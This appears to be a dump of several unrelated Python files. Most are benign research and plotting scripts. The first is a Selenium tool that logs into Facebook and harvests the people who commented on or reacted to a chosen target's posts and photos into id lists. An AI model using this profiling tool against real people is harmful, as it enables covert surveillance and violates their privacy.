            '<a href="(.[^"#]*)"><span>See More Photos</span></a>',
            driver.page_source)
        if not see_more:
            # Alternate wording used by some page variants.
            see_more = re.findall('<a href="(.[^"#]*)">Show more</a>',
                                  driver.page_source)
        if see_more:
            url = BASE_URL + see_more[0].replace('&amp;', '&')
            time.sleep(pause())
            driver.get(url)
        else:
            break
    return photos
def get_all_stories(driver, target, limit=100):
    """Collect up to `limit` story URLs authored by `target` from their timeline.

    Follows the "See More Stories" / "Show more" pagination links until the
    limit is reached or no further pages exist.
    """
    url = 'https://mbasic.facebook.com/%s?v=timeline' % target
    driver.get(url)
    stories = []
    while len(stories) < limit:
        stories += get_stories_urls(driver.page_source, target)
        see_more = re.findall(
            '<a href="(.[^"#]*)"><span>See More Stories</span></a>',
            driver.page_source)
        if not see_more:
            # Alternate wording used by some page variants.
            see_more = re.findall('<a href="(.[^"#]*)">Show more</a>',
                                  driver.page_source)
        if see_more:
            url = BASE_URL + see_more[0].replace('&amp;', '&')
            time.sleep(pause())
            driver.get(url)
        else:
            break
    return stories
def get_all_comments(driver, url, limit=200, cur_length=0):
    """Recursively collect (url, name) pairs of commenters on a story page.

    Follows the "see_next" pagination link until `limit` commenters have been
    gathered or no further page exists. `cur_length` carries the running
    count across recursive calls.
    """
    if cur_length >= limit:
        return []
    driver.get(url)
    # Re-encode to replace any characters selenium could not represent.
    html = driver.page_source.encode("utf-8",
                                     errors='replace').decode("utf-8",
                                                              errors="replace")
    commenters = parse_commenters(html)
    cur_length += len(commenters)
    more_comments_url = re.findall(
        '<div class=".[^"]*" id="see_next_[0-9]+"><a href="(.[^"]*)">', html)
    more_comments_url = [
        '%s%s' % (BASE_URL, x.replace('&amp;', '&')) for x in more_comments_url
    ]
    if (more_comments_url) and limit > cur_length:
        time.sleep(pause())
        url = more_comments_url[0]
        commenters += get_all_comments(driver,
                                       url,
                                       limit,
                                       cur_length=cur_length)
    return commenters
# given a driver on a story.php page, extracts all users who have reacted
# takes only 1st level reactions (not consideringr reactions to comments etc.)
def get_all_reactions(driver,
                      url,
                      reactions_per_page=999,
                      limit=2000,
                      cur_length=0):
    """Recursively collect (url, name) pairs of users who reacted to a story.

    Only first-level reactions are considered (not reactions to comments).
    The reaction-browser link's default '?limit=10' is bumped to
    `reactions_per_page` to reduce the number of page fetches.
    """
    if cur_length >= limit:
        return []
    driver.get(url)
    # Re-encode to replace any characters selenium could not represent.
    html = driver.page_source.encode("utf-8",
                                     errors='replace').decode("utf-8",
                                                              errors="replace")
    reactions = parse_likers(html)
    cur_length += len(reactions)
    # Negative lookahead skips per-reaction-type filters and empty counters.
    reaction_urls = re.findall(
        '(/ufi/reaction/profile/browser/(?!.*(?:reaction_type|total_count=0)).[^"]*)',
        html)
    reaction_urls = [
        '%s%s' % (BASE_URL, x.replace('&amp;', '&').replace(
            '?limit=10', '?limit=%d' % reactions_per_page))
        for x in reaction_urls
    ]
    if (reaction_urls) and limit > cur_length:
        time.sleep(pause())
        url = reaction_urls[0]
        reactions += get_all_reactions(driver, url, reactions_per_page, limit,
                                       cur_length)
    return reactions
# Given a story.php page, return a list of (url, display name)
def parse_commenters(html):
    """Return (profile_url, display_name) tuples for commenters on a story page.

    Matches the <h3><a ...> header mbasic renders above each comment; the
    profile URL is captured up to its '?r...' tracking suffix.
    """
    commenter_pattern = '<h3><a class="[^"]+" href="([^"]+)\?r[^"]*">([^<]*)</a>'
    return re.findall(commenter_pattern, html)
# Given a "reactions" page ufi/reaction/profile/browser/, returns a list of (url, display name)
def parse_likers(html):
    """Return (profile_url, display_name) tuples from a reactions browser page.

    Matches the <h3 class=...><a href=...> entries rendered by
    /ufi/reaction/profile/browser/.
    """
    liker_pattern = '<h3 class=".[^"]*"><a href="(.[^"]*)[^"]*">(.[^<]*)</a></h3>'
    return re.findall(liker_pattern, html)
def profile_picture(driver, target_username):
    """Open the target's profile-picture page and return its commenters.

    BUG FIX: the original computed the commenter list and silently discarded
    it (no return); the list of (url, name) tuples is now returned.
    """
    url = '%sphoto.php?fbid=%s' % (BASE_URL, target_username)
    driver.get(url)
    return parse_commenters(driver.page_source)
# given a list of [username, name] returns a list of [id, name, username]
# given a list of [username, name] returns a list of [id, name, username]
def fill_user_ids(driver, users):
    """Resolve the numeric Facebook id for each (username, name) pair.

    Returns (fbid, name, username) tuples. On Ctrl+C or any error the
    partially-built list collected so far is returned instead of raising.
    """
    res = []
    c = 0
    msg = '[*] Retreiving user ids... '
    try:
        for u in users:
            c += 1
            # '\r' * len(msg) rewinds over the previous progress message.
            msg = '%s[*] Retreiving user ids... %d of %d' % ('\r' * len(msg),
                                                             c, len(users))
            print(msg, end='\r')
            time.sleep(pause())  # rate-limit the profile fetches
            fbid = get_user_id(driver, u[0])
            user = (fbid, u[1], u[0])
            res.append(user)
    except (KeyboardInterrupt, SystemExit):
        print('[!] KeyboardInterrupt received. Exiting...')
        return res
    except Exception as ex:
        print('[!] Error while retrieving user ids')
        print(ex)
        return res
    return res
# given a username, finds the fb user id from the source of the profile page
# given a username, finds the fb user id from the source of the profile page
def get_user_id(driver, username):
    """Return the numeric Facebook id (as a string) for a username.

    Scrapes the '"userID":"..."' blob embedded in the full-site profile page.
    Returns the integer -1 on failure -- note the type differs from the
    string returned on success.
    """
    url = 'https://www.facebook.com/%s' % username.replace('/', '')
    driver.get(url)
    fbid = re.findall('"scale":1,"userID":"([0-9]+)"}', driver.page_source)
    if fbid:
        return fbid[0]
    else:
        print('[!] Error while getting id of user %s' % username)
        return -1
def get_username(driver, userid):
    """Return the vanity username for a numeric user id.

    Facebook redirects facebook.com/<id> to facebook.com/<username>;
    the last path segment of the final URL (query string stripped) is returned.
    """
    url = 'https://www.facebook.com/%s' % userid
    driver.get(url)
    time.sleep(pause())  # allow the redirect to complete
    return driver.current_url.split('/')[-1].split('?')[0]
def parse_args():
    """Parse command-line arguments; show --help when invoked with none.

    Returns the argparse namespace with credentials, target, scraping limits,
    output paths and browser options.
    """
    parser = argparse.ArgumentParser(
        description='Find users who interacted with a Facebook profile.')
    parser.add_argument(
        '-fu',
        '--user',
        metavar='USERNAME',
        type=str,
        help='Username of the Facebook account that will be used for scraping')
    parser.add_argument(
        '-fp',
        '--password',
        metavar='PASSWORD',
        type=str,
        # BUG FIX: help text previously said "Username" (copy-paste error).
        help='Password of the Facebook account that will be used for scraping')
    parser.add_argument(
        '-t',
        '--target',
        metavar='TARGET',
        type=str,
        help='Username or numeric id of the target Facebook account')
    parser.add_argument('-ls',
                        '--limit-stories',
                        metavar='LIMIT',
                        type=int,
                        default=20,
                        help='Max number of stories to analyze')
    parser.add_argument('-lp',
                        '--limit-photos',
                        metavar='LIMIT',
                        type=int,
                        default=20,
                        help='Max number of photos to analyze')
    parser.add_argument(
        '-lr',
        '--limit-reactions',
        metavar='LIMIT',
        default=1000,
        type=int,
        help='Max number of reactions to analyze for each story')
    parser.add_argument(
        '-lc',
        '--limit-comments',
        metavar='LIMIT',
        default=100,
        type=int,
        help='Max number of comments to analyze for each story')
    parser.add_argument('-o',
                        '--output',
                        metavar='OUTPUTFILE',
                        type=str,
                        help='Specify the name of the pivots output file')
    parser.add_argument('-csv',
                        '--csv-output',
                        metavar='CSVOUTPUTFILE',
                        type=str,
                        help='Store output file also in CSV format')
    parser.add_argument(
        '-q',
        '--headless',
        action='store_true',
        help='Run browser in headless mode. No browser window will be shown.')
    parser.add_argument('-d',
                        '--driver-path',
                        metavar='EXECUTABLE',
                        type=str,
                        help='Path to geckodriver executable')
    # With no CLI arguments, fall back to ['--help'] so usage is printed.
    args = parser.parse_args(args=None if len(sys.argv) > 1 else ['--help'])
    return args
def print_statistics(commenters, reactions):
    """Print per-user interaction counts: comments, reactions, and combined.

    Both arguments are lists of (url, name) tuples with one entry per
    interaction; duplicates are what Counter tallies.
    """
    print('-' * 78)
    print(' ' * 34, end=' ')
    print('STATISTICS')
    print('-' * 78)
    sections = [
        ('Most comments:', commenters),
        ('Most reactions:', reactions),
        ('Total:', commenters + reactions),
    ]
    for heading, interactions in sections:
        print(heading)
        for user, count in Counter(interactions).most_common():
            # user is (url, name); show name first, url in parentheses.
            print('[%d]\t%s (%s)' % (count, user[1], user[0]))
        print()
def store_csv(users, csv_file_path):
    """Write the users as CSV rows (id, name, url) to csv_file_path.

    Each element of `users` is an (id, name, url) tuple; a header row is
    written first.
    """
    print('[*] Storing users in csv file %s' % csv_file_path)
    with open(csv_file_path, mode='w', newline='',
              encoding='utf-8') as csv_file:
        writer = csv.writer(csv_file,
                            delimiter=',',
                            quotechar='"',
                            quoting=csv.QUOTE_MINIMAL)
        writer.writerow(['id', 'name', 'url'])
        writer.writerows(users)
def store_pivots(users, path):
    """Write one user id per line to `path`.

    `users` holds tuples whose first field is the id; only that field is stored.
    """
    print('[*] Storing users id in file %s' % path)
    with open(path, 'w') as f:
        f.writelines('%s\n' % entry[0] for entry in users)
def check_file_exists(file):
    """Interactively confirm overwriting `file` if it already exists.

    Prompts on stdin; any answer other than yes/y/ye exits the program.
    No-op when the file does not exist.
    """
    yes = {'yes', 'y', 'ye'}
    if os.path.isfile(file):
        print(
            '[!] Warning: output file %s already exists. Do you want to overwrite? [y/N]'
            % file,
            end=' ')
        choice = input().lower()
        if choice not in yes:
            sys.exit(0)
def main():
    """Entry point: log in, resolve the target, then harvest interacting users.

    Flow: parse args -> start Firefox -> login -> resolve target id/username
    -> collect photo and story URLs -> gather commenters and reactions per
    URL (interruptible with Ctrl+C) -> print statistics -> resolve user ids
    -> write pivot/CSV output files.
    """
    print(BANNER)
    args = parse_args()
    options = Options()
    if args.headless: options.add_argument("--headless")
    driver = webdriver.Firefox(executable_path=args.driver_path,
                               options=options)
    do_login(driver, args.user, args.password)
    check_login(driver)
    # The target may be given as a numeric id or a vanity username;
    # resolve whichever half is missing.
    if args.target.isdigit():
        target_id = args.target
        target_username = get_username(driver, target_id)
    else:
        target_id = get_user_id(driver, args.target)
        target_username = args.target
    print('[*] Selected target: %s (%s)' % (target_username, target_id))
    urls_to_visit = []  # NOTE(review): never used -- candidate for removal
    commenters = []
    reactions = []
    users = []
    print('[*] Getting photos links... ', end=" ")
    photos = get_all_photos(driver, target_id,
                            args.limit_photos)[:args.limit_photos]
    print('%d photos found' % len(photos))
    print('[*] Getting stories links... ', end=" ")
    stories = get_all_stories(driver, target_id,
                              args.limit_stories)[:args.limit_stories]
    print('%d stories found' % len(stories))
    print(
        '[*] Retreiving users who have interacted... press Ctrl+C when you have enough'
    )
    msg = ''
    try:
        for url in photos + stories:
            # Pick up commenters already visible on the current page source.
            commenters += parse_commenters(driver.page_source)
            if len(commenters) < args.limit_comments:
                commenters += get_all_comments(driver,
                                               url,
                                               limit=args.limit_comments)
            if len(reactions) < args.limit_reactions:
                reactions += get_all_reactions(driver,
                                               url,
                                               limit=args.limit_reactions)
            users = list(set(reactions).union(set(commenters)))
            # '\r' * len(msg) rewinds over the previous progress message.
            msg = '%sUnique users: %d Comments: %d Reactions: %d' % (
                '\r' * len(msg), len(users), len(commenters), len(reactions))
            print(msg, end='\r')
    except (KeyboardInterrupt, SystemExit):
        # Ctrl+C stops collection but keeps whatever was gathered so far.
        print('[!] KeyboardInterrupt received. %d users retrieved' %
              len(users))
    reactions = reactions[:args.limit_reactions]
    commenters = commenters[:args.limit_comments]
    users = list(set(reactions).union(set(commenters)))
    print_statistics(commenters, reactions)
    users = fill_user_ids(driver, users)
    if args.output:
        store_pivots(users, args.output)
    else:
        store_pivots(users, '%s-pivots.txt' % target_id)
    if args.csv_output:
        store_csv(users, args.csv_output)
    print('[*] Found %d comments and %d reactions from %d unique users ' %
          (len(commenters), len(reactions), len(users)))
    driver.close()
if __name__ == '__main__':
main() |
15,687 | 06ed9c4a0bdee76ef648fe7e5a70a61abae6d89c | # -*- coding: utf-8 -*-
"""
Visualization functions
"""
import matplotlib.pyplot as plt
import numpy as np
# Visualize the training course
from utilities.losses import compute_loss
def compute_z_loss(y, x, thetas):
    """
    Compute z-axis values (a loss surface over a grid of (w, b) parameters)
    :param y: train labels
    :param x: train data
    :param thetas: model parameters; rows of (w, b) pairs, column 0 = w, column 1 = b
    :return: z_losses value (loss) for z-axis, shape (len(w), len(b))
    """
    thetas = np.array(thetas)
    # NOTE(review): these reshapes are no-ops on a 1-D column slice --
    # presumably kept for clarity; confirm thetas is always 2-D.
    w = thetas[:, 0].reshape(thetas[:, 0].shape[0], )
    b = thetas[:, 1].reshape(thetas[:, 1].shape[0], )
    z_losses = np.zeros((len(w), len(b)))
    # Evaluate the MSE loss at every (w, b) grid point; O(len(w) * len(b)).
    for ind_row, row in enumerate(w):
        for ind_col, col in enumerate(b):
            theta = np.array([row, col])
            z_losses[ind_row, ind_col] = compute_loss(y, x, theta, "MSE")
    return z_losses
def predict(x, thetas):
    """
    Predict function: linear model output as the matrix product of the
    data and the parameters.
    :param x: test data
    :param thetas: trained model parameters
    :return: predicted labels
    """
    return x @ thetas
def visualize_train(train_data_full, train_labels, train_data, thetas, losses, niter):
    """
    Visualize Function for Training Results
    :param train_data_full: the train data set (full) with labels and data
    :param train_labels: training labels used to evaluate the loss surface
    :param train_data: standardized training data used for prediction
    :param thetas: model parameters tracked at each iteration
    :param losses: all tracked losses
    :param niter: completed training iterations
    :return: fig1 the figure for line fitting on training data
             fig2 learning curve in terms of error
             fig3 gradient variation visualization
    """
    # Figure 1: scatter of the raw data with the fitted line overlaid.
    fig1, ax1 = plt.subplots()
    ax1.scatter(train_data_full["Weight"], train_data_full["Height"], color = 'blue')
    # De-standarize
    train_mean = train_data_full["Weight"].mean()
    train_std = train_data_full["Weight"].std()
    train_data_for_plot = train_mean + train_data["Weight"] * train_std
    ax1.plot(train_data_for_plot, predict(train_data, thetas[niter - 1]), color = 'red', linewidth = 2)
    ax1.set_xlabel("Height")
    ax1.set_ylabel("Weight")
    # Figure 2: loss per iteration (learning curve).
    fig2, ax2 = plt.subplots()
    ax2.plot(range(len(losses)), losses, color = 'blue', linewidth = 2)
    ax2.set_xlabel("Iteration")
    ax2.set_ylabel("MSE")
    # Figure 3: loss-surface contour with the optimization trajectory.
    fig3, ax3 = plt.subplots()
    np_gradient_ws = np.array(thetas)
    w = np.linspace(min(np_gradient_ws[:, 0]), max(np_gradient_ws[:, 0]), len(np_gradient_ws[:, 0]))
    b = np.linspace(min(np_gradient_ws[:, 1]), max(np_gradient_ws[:, 1]), len(np_gradient_ws[:, 1]))
    x, y = np.meshgrid(w, b)
    z = compute_z_loss(train_labels, train_data, np.stack((w,b)).T)
    cp = ax3.contourf(x, y, z, cmap = plt.cm.jet)
    fig3.colorbar(cp, ax = ax3)
    # NOTE(review): hard-coded optimum marker -- presumably the known
    # analytic solution for this dataset; confirm if the data changes.
    ax3.plot(3.54794951, 66.63949115837143, color = 'red', marker = '*', markersize = 20)
    if niter > 0:
        thetas_to_plot = np_gradient_ws[:niter]
        ax3.plot(thetas_to_plot[:, 0], thetas_to_plot[:, 1], marker = 'o', color = 'w', markersize = 10)
    ax3.set_xlabel(r'$w$')
    ax3.set_ylabel(r'$b$')
    return fig1, fig2, fig3
def visualize_test(test_data_full, test_data, thetas):
    """
    Visualize Test for Testing Results
    :param test_data_full: the test data set (full) with labels and data
    :param test_data: standardized test data fed to predict()
    :param thetas: model parameters; the last entry is used for prediction
    :return: fig scatter of the test data with the fitted line overlaid
    """
    fig, ax = plt.subplots()
    ax.scatter(test_data_full["Weight"], test_data_full["Height"], color='blue')
    ax.plot(test_data_full["Weight"], predict(test_data, thetas[-1]), color='red', linewidth=2)
    return fig
|
15,688 | 6b8f1c5d4debe159ceb3f85514577fd4dec9df2b | import simplejson as json
import urllib
# Python 2 script: query the (now retired) Freebase MQL read API for 100
# music artists and print their names.
api_key = open(".freebase_api_key").read()  # NOTE(review): handle never closed
service_url = 'https://www.googleapis.com/freebase/v1/mqlread'
# MQL query: entities typed both /music/artist and /common/topic.
query = [{"name": {}, "a:type":"/music/artist", "b:type": "/common/topic", "limit": 100}]
params = {'query': json.dumps(query), 'key': api_key}
url = service_url + '?' + urllib.urlencode(params)
print url
response = json.loads(urllib.urlopen(url).read())
# NOTE(review): bare except hides real errors; presumably meant to dump the
# raw response when 'result' is missing (e.g. API error payload).
try:
    for artist in response['result']:
        print repr(artist['name']['value']) #print planet['name']['value']
except:
    print response
|
15,689 | 43d707adff7ee6342ed39b9adfb7ca8d1424604b | import json
def count_ys(filename):
    """Tally "as mysterious as" comparisons found in a text file.

    For each line containing the phrase, token 4 (0-based, whitespace split)
    is the key and token 6 is parsed as an integer count; counts for the
    same key are summed.

    :param filename: path of the text file to scan
    :return: dict mapping key token -> summed integer count
    """
    dic = {}
    # "with" closes the file even on error (original leaked the handle).
    # Plain `in` membership replaces dict.has_key(), removed in Python 3.
    # The unused `counter` local was dropped.
    with open(filename, 'r') as f:
        for line in f:
            if "as mysterious as" in line:
                temp = line.split()
                if temp[4] in dic:
                    dic[temp[4]] = dic[temp[4]] + int(temp[6])
                else:
                    dic[temp[4]] = int(temp[6])
    return dic
# Python 2 driver: count the phrases, then dump the dict and the keys
# ordered by descending count (sorted() over a dict yields its keys).
ddic = count_ys("as_x.txt")
ddic_sorted = sorted(ddic, key=ddic.get, reverse=True)
print json.dumps(ddic, indent=4)
print json.dumps(ddic_sorted, indent=4)
|
15,690 | 6fe1f8e6a9f3511b5ec1c358a4bfa8eef6a0b571 | #!/usr/bin/env python3
import matplotlib.pyplot as plt
from matplotlib.cm import get_cmap
import matplotlib
import statistics
from ast import literal_eval as make_tuple
from scipy import interpolate
import numpy as np
import sys
# AOMS: plot VMAF-vs-bitrate curves for each AOM --aq-mode found in the
# input file (a Python-literal list of tuples: index 1 = time, 2 = aq mode,
# 4 = bitrate, 5 = VMAF).
plt.plot([], [], ' ', label='Aq modes comparison')  # invisible series; adds a legend title line
with open(sys.argv[1], 'r') as f:
    data = make_tuple(f.read())
dt = []
x_limit = []
y_limit = []
for q in sorted(set([x[2] for x in data])):
    dt = [x for x in data if x[2] == q]
    # NOTE(review): x and y are sorted independently, which decouples the
    # (bitrate, vmaf) pairs -- presumably acceptable for a monotone curve,
    # but confirm. The comprehension variable x also shadows the outer x.
    x = sorted([x[4] for x in dt])
    y = sorted([x[5] for x in dt])
    x_limit.append((min(x), max(x)))
    y_limit.append((min(y), max(y)))
    time = sum([x[1] for x in dt])/len(dt)  # NOTE(review): computed but never used
    # Smooth the curve with quadratic interpolation at 1-unit resolution.
    f = interpolate.interp1d(x, y, kind='quadratic')
    xnew = np.linspace(min(x), max(x), max(x) - min(x) )
    plt.plot(xnew, f(xnew), label=f'--aq-mode={q}', linewidth=3)
# Plot: shared axis limits across all modes.
xlim = min([x[0] for x in x_limit])
x_max = max(([x[1] for x in x_limit]))
ylim = min([x[0] for x in y_limit])
y_max = max(([x[1] for x in y_limit]))
plt.tight_layout()
plt.xticks([x for x in range(0, x_max, 1000)])
plt.yticks([x for x in range(30, 100, 1)])
# Manual gridlines: light verticals every 500, alternating horizontals.
[plt.axvline(i, color='grey', linewidth=0.3) for i in range(0, x_max, 500)]
[plt.axhline(i, color='grey', linewidth=0.5) for i in range(21, 100, 2)]
[plt.axhline(i, color='black', linewidth=1) for i in range(22, 100, 2)]
plt.ylabel('Vmaf', size=20)
plt.xlabel('Bitrate', size=20)
plt.title('AOM --aq-mode=0 vs --aq-mode=1 31.07.2020 ', size=30)
plt.legend(prop={'size': 20}, loc="lower right")
plt.xlim(xlim, x_max)
plt.ylim((ylim, 100))
plt.show()
|
15,691 | 29a1689718e09d035a75ffbc8dc070828d6a2815 | import numpy as np
from random import randint, random
# -------------------------------------------------------------------------------------
# Extended two step
# -------------------------------------------------------------------------------------
def with_prob(prob):
    """Return True with the specified probability, False otherwise."""
    return prob > random()
class Extended_two_step:
'''Two step task with reversals in both which side is good and the transition matrix.'''
    def __init__(self, neutral_reward_probs = False):
        """Set up task parameters and start the first session.

        :param neutral_reward_probs: if True, every reward block uses the
            flat 0.4/0.4 probabilities (no side is ever better).
        """
        # Parameters
        self.norm_prob = 0.8 # Probability of normal transition.
        self.neutral_reward_probs = neutral_reward_probs
        if neutral_reward_probs:
            self.reward_probs = np.array([[0.4, 0.4], # Reward probabilities in each reward block type.
                                          [0.4, 0.4],
                                          [0.4, 0.4]])
        else:
            self.reward_probs = np.array([[0.8, 0.2], # Reward probabilities in each reward block type.
                                          [0.4, 0.4],
                                          [0.2, 0.8]])
        self.threshold = 0.75 # Choice moving-average level that triggers the transition criterion.
        self.tau = 8. # Time constant of moving average.
        self.min_block_length = 40 # Minimum block length.
        self.min_trials_post_criterion = 20 # Number of trials after transition criterion reached before transition occurs.
        self.mov_ave = exp_mov_ave(tau = self.tau, init_value = 0.5) # Moving average of agents choices.
        self.reset()
    def reset(self, n_trials = 1000):
        """Start a fresh session: randomize block states and clear all counters.

        :param n_trials: session length in trials.
        """
        self.transition_block = with_prob(0.5) # True for A blocks, false for B blocks.
        self.reward_block = randint(0,2) # 0 for left good, 1 for neutral, 2 for right good.
        self.block_trials = 0 # Number of trials into current block.
        self.cur_trial = 0 # Current trial number.
        self.trans_crit_reached = False # True if transition criterion reached in current block.
        self.trials_post_criterion = 0 # Current number of trials past criterion.
        self.trial_number = 1 # NOTE(review): appears to duplicate cur_trial -- confirm which is authoritative.
        self.n_trials = n_trials # Session length.
        self.mov_ave.reset()
        self.end_session = False
        # Per-session record of block boundaries and their states.
        self.blocks = {'start_trials' : [0],
                       'end_trials' : [],
                       'reward_states' : [self.reward_block], # 0 for left good, 1 for neutral, 2 for right good.
                       'transition_states' : [self.transition_block]} # 1 for A blocks, 0 for B blocks.
def trial(self, choice):
# Update moving average.
self.mov_ave.update(choice)
second_step = (choice == with_prob(self.norm_prob)) == self.transition_block
self.block_trials += 1
self.cur_trial += 1
outcome = int(with_prob(self.reward_probs[self.reward_block, second_step]))
# Check for block transition.
block_transition = False
if self.trans_crit_reached:
self.trials_post_criterion +=1
if (self.trials_post_criterion >= self.min_trials_post_criterion) & \
(self.block_trials >= self.min_block_length):
block_transition = True
else: # Check if transition criterion reached.
if self.reward_block == 1 or self.neutral_reward_probs: #Neutral block
if (self.block_trials > 20) & with_prob(0.04):
self.trans_crit_reached = True
elif self.transition_block ^ (self.reward_block == 0): # High is good option
if self.mov_ave.ave > self.threshold:
self.trans_crit_reached = True
else: # Low is good option
if self.mov_ave.ave < (1. -self.threshold):
self.trans_crit_reached = True
if block_transition:
self.block_trials = 0
self.trials_post_criterion = 0
self.trans_crit_reached = False
old_rew_block = self.reward_block
if old_rew_block == 1: # End of neutral block always transitions to one side
self.reward_block = with_prob(0.5) * 2 # being good without reversal of transition probabilities.
else: # End of block with one side good, 50% chance of change in transition probs.
if with_prob(0.5): #Reversal in transition probabilities.
self.transition_block = not self.transition_block
if with_prob(0.5): # 50% chance of transition to neutral block.
self.reward_block = 1
else: # No reversal in transition probabilities.
if with_prob(0.5):
self.reward_block = 1 # Transition to neutral block.
else:
self.reward_block = 2 - old_rew_block # Invert reward probs.
self.blocks['start_trials'].append(self.cur_trial)
self.blocks['end_trials'].append(self.cur_trial)
self.blocks['reward_states'].append(self.reward_block)
self.blocks['transition_states'].append(self.transition_block)
if self.cur_trial >= self.n_trials: #End of session.
self.end_session = True
self.blocks['end_trials'].append(self.cur_trial + 1)
self.blocks['trial_trans_state'] = np.zeros(self.n_trials, dtype = bool) #Boolean array indication state of tranistion matrix for each trial.
self.blocks['trial_rew_state'] = np.zeros(self.n_trials, dtype = int)
for start_trial,end_trial, trans_state, reward_state in \
zip(self.blocks['start_trials'],self.blocks['end_trials'], \
self.blocks['transition_states'], self.blocks['reward_states']):
self.blocks['trial_trans_state'][start_trial - 1:end_trial-1] = trans_state
self.blocks['trial_rew_state'][start_trial - 1:end_trial-1] = reward_state
return (second_step, outcome)
class exp_mov_ave:
    '''Exponential moving average with time constant tau.

    update() folds each new sample into the average with weight
    (1 - exp(-1/tau)), so roughly the last tau samples dominate.
    '''
    def __init__(self, tau, init_value):
        self.tau = tau
        self.init_value = init_value
        self.reset()

    def reset(self, init_value = None, tau = None):
        '''Reset the average, optionally changing tau and/or the initial value.

        Uses explicit `is not None` checks (not truthiness) so that
        reset(init_value=0) actually resets the average to zero instead of
        silently keeping the old initial value.
        '''
        if tau is not None:
            self.tau = tau
        if init_value is not None:
            self.init_value = init_value
        self.ave = self.init_value
        self._m = np.exp(-1./self.tau)   # decay multiplier per sample
        self._i = 1 - self._m            # weight given to each new sample

    def update(self, sample):
        '''Fold one new sample into the running average.'''
        self.ave = (self.ave * self._m) + (self._i * sample)
|
# Print the start of the Fibonacci sequence: the two seeds 0 and 1,
# followed by the next ten terms.
a = 0
b = 1
i = 0
print(a)
print(b)
while i < 10:
    c = a + b
    a, b = b, c
    i += 1
    print(c)
|
"""Build a node2vec feature tensor aligned with the rows of a dataset.

Loads node2vec embeddings (cached to .npy after the first parse), builds a
paperid -> (1, DIM) tensor dict (cached to .pkl), then maps every row of the
dataset's Id column through id -> paperId -> embedding, substituting a zero
vector when either mapping misses, and pickles the stacked result.
"""
import pandas as pd
import numpy as np
import torch
import pickle
import os

DIM_NODE2VEC = 128  # overwritten below by the actual embedding width
PATH_NODE2VEC = 'cit_128.emb'
#ID_SRC = '../data/task2_trainset.csv' # generating node_vec for train/valid set
ID_SRC = '../data/task2_public_testset.csv' # generating node_vec for test set

# read the vectors and corresponding paperid's (cached as .npy after first run)
if os.path.exists('paperid_vec.npy') and os.path.exists('paperid.npy'):
    paperid_vec = np.load('paperid_vec.npy')
    paperid = np.load('paperid.npy')
    print('npy files loaded.')
else:
    cit_emb = np.loadtxt(PATH_NODE2VEC, delimiter=' ', skiprows=1)
    paperid_vec = cit_emb[:, 1:]
    paperid = cit_emb[:, 0].astype(np.uint32)
    np.save('paperid_vec', paperid_vec)
    np.save('paperid', paperid)
    print('npy files saved.')

DIM_NODE2VEC = paperid_vec.shape[1]
print(paperid_vec.shape)
print(paperid.shape)
print(paperid_vec[:5, :5])
print(paperid[:10])

# generate or load the paperid-tensor dict.
if os.path.exists('paperid2vec_dict.pkl'):
    with open('paperid2vec_dict.pkl', 'rb') as dict_file:
        paperid2vec_dict = pickle.load(dict_file)
    print('pkl loaded.')
else:
    # build a paperid -> (1, DIM) tensor dict
    paperid2vec_dict = {}
    _total_samples_num = paperid_vec.shape[0]
    for index, pid in enumerate(paperid):  # avoid shadowing builtin `id`
        print(f'converting... {index}/{_total_samples_num}', end='\r')
        paperid2vec_dict[pid] = torch.from_numpy(paperid_vec[index]).reshape((1, DIM_NODE2VEC))
    print('\n')
    with open('paperid2vec_dict.pkl', 'wb') as dict_file:
        pickle.dump(paperid2vec_dict, dict_file)

print(len(paperid2vec_dict))
print(paperid2vec_dict[1671395369])

# mapping id with tensor
dataset_id = pd.read_csv(ID_SRC, dtype=str)['Id'] # list of id's
id_paperId = dict(pd.read_csv('id_paperId.tsv', sep='\t').values) # id to paperId
print('id_paperId.shape: ', len(id_paperId))

# Collect per-row vectors in a list and concatenate once at the end;
# torch.cat inside the loop re-copies the accumulated tensor on every
# iteration, which is quadratic in the dataset size.
rows = []
_total_samples_num = dataset_id.shape[0]
hit, miss = 0, 0
for index, row_id in enumerate(dataset_id):
    print(f'dealing with {index}/{_total_samples_num}...', end='\r')
    vec = None
    if row_id in id_paperId:
        vec = paperid2vec_dict.get(id_paperId[row_id])
    if vec is not None:
        rows.append(vec)
        hit += 1
    else:
        # No embedding for this row: pad with a zero vector.
        rows.append(torch.zeros((1, DIM_NODE2VEC)).type(torch.DoubleTensor))
        miss += 1
node_vec = torch.cat(rows, 0) if rows else torch.zeros((0, DIM_NODE2VEC)).type(torch.DoubleTensor)
print('\n')
print('final tensor shape: ', node_vec.shape)
print(node_vec[:30, :5])
print('hit: ', hit)
print('miss: ', miss)
print('total:', hit+miss)

# saving the node vector
with open('node_vec.pkl', 'wb') as out_file:
    pickle.dump(node_vec, out_file)
print('node_vec.pkl saved.')
15,694 | 3e3b8c5fce934431a7717409003ba84545bda121 | import numpy as np
from matplotlib import pyplot as plt
import json
def plot_hist(history1, history2, history3, history4, history5, dataset):
    """Plot training and validation accuracy curves for five models.

    Each history is a dict with 100-entry 'acc' and 'val_acc' lists; the
    figure is saved as 'nc_<dataset>_acc.svg'.
    """
    labelled = [(history1, 'GAT'), (history2, 'GCN'), (history3, 'PPNP'),
                (history4, 'RGCN'), (history5, 'SGC')]
    fig = plt.figure(figsize=(8, 3))
    epochs = np.arange(1, 101)
    # Left panel: training accuracy; right panel: validation accuracy.
    for position, (key, axis_label) in enumerate(
            [('acc', 'Acc'), ('val_acc', 'Val Acc')], start=1):
        plt.subplot(1, 2, position)
        for history, label in labelled:
            plt.plot(epochs, history[key], label=label)
        plt.xlabel('Epochs')
        plt.ylabel(axis_label)
        plt.grid(True)
        plt.legend()
    fig.suptitle(dataset.upper())
    plt.tight_layout()
    plt.savefig('nc_' + dataset + '_acc.svg')
def main():
    """Load each saved <algo>_<dataset>_history.json and render one
    accuracy figure per dataset via plot_hist."""
    algorithms = ['gat', 'gcn', 'ppnp', 'rgcn', 'sgc']
    datasets = ['aifb', 'citeseer', 'cora', 'pubmed']
    histories = {}
    for algorithm in algorithms:
        for dataset in datasets:
            with open(algorithm + '_' + dataset + '_history.json', 'rt') as handle:
                histories[(algorithm, dataset)] = json.load(handle)
    # One figure per dataset, histories passed in the fixed algorithm order.
    for dataset in datasets:
        plot_hist(*[histories[(algorithm, dataset)] for algorithm in algorithms],
                  dataset)


if __name__ == '__main__':
    main()
|
15,695 | 943c0a70aa99cef039fa07ac1b6dc919e7e08f4d |
# -*- coding: utf-8 -*-
"""
Created on Jul 21 2017, Modified Apr 10 2018.
@author: J. C. Vasquez-Correa, T. Arias-Vergara, J. S. Guerrero
